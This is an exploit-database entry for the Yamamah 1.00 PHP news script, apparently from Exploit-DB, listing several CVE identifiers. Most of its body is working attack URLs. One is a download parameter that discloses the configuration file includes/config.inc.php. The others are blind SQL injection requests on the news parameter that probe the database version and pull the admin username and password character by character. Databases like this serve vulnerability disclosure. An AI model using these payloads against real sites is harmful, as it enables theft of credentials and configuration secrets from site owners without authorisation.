[] NeoSense

Yamamah - 'news' SQL Injection / Source Code Disclosure

Author: anT!-Tr0J4n
type: webapps
platform: php
port: 
date_added: 2010-06-11 
date_updated: 2016-10-27 
verified: 0 
codes: CVE-2010-2336;CVE-2010-2335;CVE-2010-2334;CVE-2010-1300;OSVDB-65648;OSVDB-65479;OSVDB-63344 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comyamamah_v1.rar

# Exploit Title: Yamamah Vulnerability (news) SQL Injection / disclosure Vulnerability
# Date: 12-06-2010
# Author: anT!-Tr0J4n
#My Home : www.Dev-PoinT.com
# Software Link:http://www.yamamah.org
# Version: 1.00
# Tested on: Win7/Linux
#DorK       : N / A

========== Exploit By anT!-Tr0J4n============

=======Yamamah source code disclosure Vulnerability ============

[>] exploit ->

http://localhsot/yamamah/index.php?download=(file name)

http://server/[path]/index.php?download=includes/config.inc.php

======================================================
[>] Yamamah (news) Blind SQL Injection Vulnerability
======================================================
[>] exploit ->

[>] (news) Blind SQL Injection

[>] http://localhost/yamamah/?news=1[BSQLi]

=================POC=====================

http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True

http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False

http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1

http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1

===============ABDO-R3ZK==================

MY HomE : www.Dev-PoinT.com
Author : anT!-Tr0J4n
EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com

Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/ProfessionaL/Coffin Of Evil/HoBeeZ/ ABO-FaHED /Gonone Rash3d EL maged /mahmoudvip/
 Mr.Mh$TEr / M [Zero] / R3d-D3v1l (ALL sEc-r1z crEw) /Cyber-Err0r/ saLman EL anz33 / FnooN =ABUO ShADEN /NASHY  && And All My Frindes

===============ABDO-R3ZK==================